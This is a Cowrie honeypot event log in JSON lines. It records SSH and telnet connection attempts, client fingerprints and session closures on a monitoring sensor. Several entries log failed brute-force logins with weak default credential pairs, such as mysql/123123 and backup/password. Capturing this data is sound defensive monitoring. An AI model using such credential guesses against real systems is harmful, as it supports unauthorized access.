{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:41:31.035206Z","src_ip":"196.251.115.108","session":"d32e70fe955d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:41:31.036091Z","src_ip":"196.251.115.108","session":"d32e70fe955d"}
{"eventid":"cowrie.session.closed","duration":13.886093854904175,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:32.365038Z","src_ip":"60.22.179.111","session":"a4a56e773961"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36670,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f101c254cd1","protocol":"telnet","message":"New connection: 60.22.179.111:36670 (1.2.3.4:23) [session: 9f101c254cd1]","sensor":"my-vps","timestamp":"2025-08-24T23:41:32.549207Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123123","message":"login attempt [mysql/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:41:34.205636Z","src_ip":"196.251.115.108","session":"d32e70fe955d"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:35.349676Z","src_ip":"196.251.115.108","session":"d32e70fe955d"}
{"eventid":"cowrie.session.closed","duration":14.130213260650635,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:37.675743Z","src_ip":"60.22.179.111","session":"9b444f550ff3"}
{"eventid":"cowrie.session.closed","duration":14.036263704299927,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:37.732362Z","src_ip":"60.22.179.111","session":"07570c99e513"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36785,"dst_ip":"1.2.3.4","dst_port":23,"session":"996d7b96be65","protocol":"telnet","message":"New connection: 60.22.179.111:36785 (1.2.3.4:23) [session: 996d7b96be65]","sensor":"my-vps","timestamp":"2025-08-24T23:41:37.901478Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36784,"dst_ip":"1.2.3.4","dst_port":23,"session":"98e8fc34cbdf","protocol":"telnet","message":"New connection: 60.22.179.111:36784 (1.2.3.4:23) [session: 98e8fc34cbdf]","sensor":"my-vps","timestamp":"2025-08-24T23:41:37.957671Z"}
{"eventid":"cowrie.session.closed","duration":14.003228187561035,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:38.549027Z","src_ip":"60.22.179.111","session":"ff0708c5e90f"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36793,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b3d3c1cca58","protocol":"telnet","message":"New connection: 60.22.179.111:36793 (1.2.3.4:23) [session: 5b3d3c1cca58]","sensor":"my-vps","timestamp":"2025-08-24T23:41:38.707202Z"}
{"eventid":"cowrie.session.closed","duration":13.092043399810791,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:39.559042Z","src_ip":"60.22.179.111","session":"e05707ffc901"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36802,"dst_ip":"1.2.3.4","dst_port":23,"session":"58b1f6962550","protocol":"telnet","message":"New connection: 60.22.179.111:36802 (1.2.3.4:23) [session: 58b1f6962550]","sensor":"my-vps","timestamp":"2025-08-24T23:41:39.743124Z"}
{"eventid":"cowrie.session.closed","duration":13.71746277809143,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:43.522932Z","src_ip":"60.22.179.111","session":"26c73a88dce9"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36875,"dst_ip":"1.2.3.4","dst_port":23,"session":"12aa4a89d4b5","protocol":"telnet","message":"New connection: 60.22.179.111:36875 (1.2.3.4:23) [session: 12aa4a89d4b5]","sensor":"my-vps","timestamp":"2025-08-24T23:41:43.652995Z"}
{"eventid":"cowrie.session.closed","duration":14.023428201675415,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:46.572569Z","src_ip":"60.22.179.111","session":"9f101c254cd1"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36963,"dst_ip":"1.2.3.4","dst_port":23,"session":"7845f23b93bc","protocol":"telnet","message":"New connection: 60.22.179.111:36963 (1.2.3.4:23) [session: 7845f23b93bc]","sensor":"my-vps","timestamp":"2025-08-24T23:41:46.758594Z"}
{"eventid":"cowrie.session.closed","duration":13.12406301498413,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:51.081656Z","src_ip":"60.22.179.111","session":"98e8fc34cbdf"}
{"eventid":"cowrie.session.closed","duration":13.673000574111938,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:51.574409Z","src_ip":"60.22.179.111","session":"996d7b96be65"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36991,"dst_ip":"1.2.3.4","dst_port":23,"session":"7febf8a9daf1","protocol":"telnet","message":"New connection: 60.22.179.111:36991 (1.2.3.4:23) [session: 7febf8a9daf1]","sensor":"my-vps","timestamp":"2025-08-24T23:41:51.739137Z"}
{"eventid":"cowrie.session.closed","duration":13.743536233901978,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:52.450645Z","src_ip":"60.22.179.111","session":"5b3d3c1cca58"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37000,"dst_ip":"1.2.3.4","dst_port":23,"session":"3a74ec9bce13","protocol":"telnet","message":"New connection: 60.22.179.111:37000 (1.2.3.4:23) [session: 3a74ec9bce13]","sensor":"my-vps","timestamp":"2025-08-24T23:41:52.657750Z"}
{"eventid":"cowrie.session.closed","duration":13.759894609451294,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:53.502941Z","src_ip":"60.22.179.111","session":"58b1f6962550"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37020,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8211ffdf1c7","protocol":"telnet","message":"New connection: 60.22.179.111:37020 (1.2.3.4:23) [session: b8211ffdf1c7]","sensor":"my-vps","timestamp":"2025-08-24T23:41:53.670603Z"}
{"eventid":"cowrie.session.closed","duration":13.802149295806885,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:57.455075Z","src_ip":"60.22.179.111","session":"12aa4a89d4b5"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37143,"dst_ip":"1.2.3.4","dst_port":23,"session":"738378e9d6f7","protocol":"telnet","message":"New connection: 60.22.179.111:37143 (1.2.3.4:23) [session: 738378e9d6f7]","sensor":"my-vps","timestamp":"2025-08-24T23:41:57.722914Z"}
{"eventid":"cowrie.session.closed","duration":13.506049633026123,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:00.264543Z","src_ip":"60.22.179.111","session":"7845f23b93bc"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37158,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3dcdcad35ee","protocol":"telnet","message":"New connection: 60.22.179.111:37158 (1.2.3.4:23) [session: d3dcdcad35ee]","sensor":"my-vps","timestamp":"2025-08-24T23:42:00.437731Z"}
{"eventid":"cowrie.session.closed","duration":13.869338989257812,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:05.608409Z","src_ip":"60.22.179.111","session":"7febf8a9daf1"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37292,"dst_ip":"1.2.3.4","dst_port":23,"session":"62f5b47ebe4b","protocol":"telnet","message":"New connection: 60.22.179.111:37292 (1.2.3.4:23) [session: 62f5b47ebe4b]","sensor":"my-vps","timestamp":"2025-08-24T23:42:05.842298Z"}
{"eventid":"cowrie.session.closed","duration":13.852404594421387,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:06.510088Z","src_ip":"60.22.179.111","session":"3a74ec9bce13"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37318,"dst_ip":"1.2.3.4","dst_port":23,"session":"4db3bb037b36","protocol":"telnet","message":"New connection: 60.22.179.111:37318 (1.2.3.4:23) [session: 4db3bb037b36]","sensor":"my-vps","timestamp":"2025-08-24T23:42:06.657543Z"}
{"eventid":"cowrie.session.closed","duration":13.711112976074219,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:07.381646Z","src_ip":"60.22.179.111","session":"b8211ffdf1c7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37324,"dst_ip":"1.2.3.4","dst_port":23,"session":"e66d5bbca602","protocol":"telnet","message":"New connection: 60.22.179.111:37324 (1.2.3.4:23) [session: e66d5bbca602]","sensor":"my-vps","timestamp":"2025-08-24T23:42:07.583795Z"}
{"eventid":"cowrie.session.closed","duration":13.751791715621948,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:11.474633Z","src_ip":"60.22.179.111","session":"738378e9d6f7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37341,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d839e8994f0","protocol":"telnet","message":"New connection: 60.22.179.111:37341 (1.2.3.4:23) [session: 6d839e8994f0]","sensor":"my-vps","timestamp":"2025-08-24T23:42:11.579034Z"}
{"eventid":"cowrie.session.closed","duration":12.377009153366089,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:12.814696Z","src_ip":"60.22.179.111","session":"d3dcdcad35ee"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":47282,"dst_ip":"1.2.3.4","dst_port":22,"session":"433a670cc8cb","protocol":"ssh","message":"New connection: 196.251.115.108:47282 (1.2.3.4:22) [session: 433a670cc8cb]","sensor":"my-vps","timestamp":"2025-08-24T23:42:18.383911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:42:18.839388Z","src_ip":"196.251.115.108","session":"433a670cc8cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:42:18.840167Z","src_ip":"196.251.115.108","session":"433a670cc8cb"}
{"eventid":"cowrie.session.closed","duration":13.192952632904053,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:19.034979Z","src_ip":"60.22.179.111","session":"62f5b47ebe4b"}
{"eventid":"cowrie.session.closed","duration":13.296247005462646,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:19.952834Z","src_ip":"60.22.179.111","session":"4db3bb037b36"}
{"eventid":"cowrie.session.closed","duration":13.32205605506897,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:20.905773Z","src_ip":"60.22.179.111","session":"e66d5bbca602"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"111111","message":"login attempt [mysql/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:42:21.757243Z","src_ip":"196.251.115.108","session":"433a670cc8cb"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:22.976685Z","src_ip":"196.251.115.108","session":"433a670cc8cb"}
{"eventid":"cowrie.session.closed","duration":13.790735483169556,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:25.369673Z","src_ip":"60.22.179.111","session":"6d839e8994f0"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37540,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b045ee60c70","protocol":"telnet","message":"New connection: 60.22.179.111:37540 (1.2.3.4:23) [session: 5b045ee60c70]","sensor":"my-vps","timestamp":"2025-08-24T23:42:25.580418Z"}
{"eventid":"cowrie.session.closed","duration":13.682779788970947,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:39.263123Z","src_ip":"60.22.179.111","session":"5b045ee60c70"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":37861,"dst_ip":"1.2.3.4","dst_port":23,"session":"65d3b5aed759","protocol":"telnet","message":"New connection: 60.22.179.111:37861 (1.2.3.4:23) [session: 65d3b5aed759]","sensor":"my-vps","timestamp":"2025-08-24T23:42:39.454947Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60504,"dst_ip":"1.2.3.4","dst_port":22,"session":"903ade91778a","protocol":"ssh","message":"New connection: 217.72.205.35:60504 (1.2.3.4:22) [session: 903ade91778a]","sensor":"my-vps","timestamp":"2025-08-24T23:42:52.774219Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:52.775486Z","src_ip":"217.72.205.35","session":"903ade91778a"}
{"eventid":"cowrie.session.closed","duration":13.63655710220337,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:42:53.091434Z","src_ip":"60.22.179.111","session":"65d3b5aed759"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45450,"dst_ip":"1.2.3.4","dst_port":22,"session":"748e934078a2","protocol":"ssh","message":"New connection: 196.251.115.108:45450 (1.2.3.4:22) [session: 748e934078a2]","sensor":"my-vps","timestamp":"2025-08-24T23:43:04.592781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:43:04.951628Z","src_ip":"196.251.115.108","session":"748e934078a2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:43:04.952347Z","src_ip":"196.251.115.108","session":"748e934078a2"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234567","message":"login attempt [mysql/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:43:08.598064Z","src_ip":"196.251.115.108","session":"748e934078a2"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:43:09.709415Z","src_ip":"196.251.115.108","session":"748e934078a2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59586,"dst_ip":"1.2.3.4","dst_port":22,"session":"a76a0f054f55","protocol":"ssh","message":"New connection: 196.251.115.108:59586 (1.2.3.4:22) [session: a76a0f054f55]","sensor":"my-vps","timestamp":"2025-08-24T23:43:54.003062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:43:54.992283Z","src_ip":"196.251.115.108","session":"a76a0f054f55"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:43:54.992871Z","src_ip":"196.251.115.108","session":"a76a0f054f55"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456","message":"login attempt [backup/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:43:57.845843Z","src_ip":"196.251.115.108","session":"a76a0f054f55"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:43:59.165325Z","src_ip":"196.251.115.108","session":"a76a0f054f55"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55578,"dst_ip":"1.2.3.4","dst_port":22,"session":"b07f7900044a","protocol":"ssh","message":"New connection: 196.251.115.108:55578 (1.2.3.4:22) [session: b07f7900044a]","sensor":"my-vps","timestamp":"2025-08-24T23:44:41.742544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:44:42.042002Z","src_ip":"196.251.115.108","session":"b07f7900044a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:44:42.061618Z","src_ip":"196.251.115.108","session":"b07f7900044a"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password","message":"login attempt [backup/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:44:44.797656Z","src_ip":"196.251.115.108","session":"b07f7900044a"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:44:46.296363Z","src_ip":"196.251.115.108","session":"b07f7900044a"}
{"eventid":"cowrie.session.connect","src_ip":"111.231.71.181","src_port":59458,"dst_ip":"1.2.3.4","dst_port":22,"session":"00d31e12bf6c","protocol":"ssh","message":"New connection: 111.231.71.181:59458 (1.2.3.4:22) [session: 00d31e12bf6c]","sensor":"my-vps","timestamp":"2025-08-24T23:45:17.086646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:45:17.087861Z","src_ip":"111.231.71.181","session":"00d31e12bf6c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T23:45:26.295998Z","src_ip":"111.231.71.181","session":"00d31e12bf6c"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:45:26.298051Z","src_ip":"111.231.71.181","session":"00d31e12bf6c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42536,"dst_ip":"1.2.3.4","dst_port":22,"session":"aec975e9019c","protocol":"ssh","message":"New connection: 196.251.115.108:42536 (1.2.3.4:22) [session: aec975e9019c]","sensor":"my-vps","timestamp":"2025-08-24T23:45:30.339179Z"}
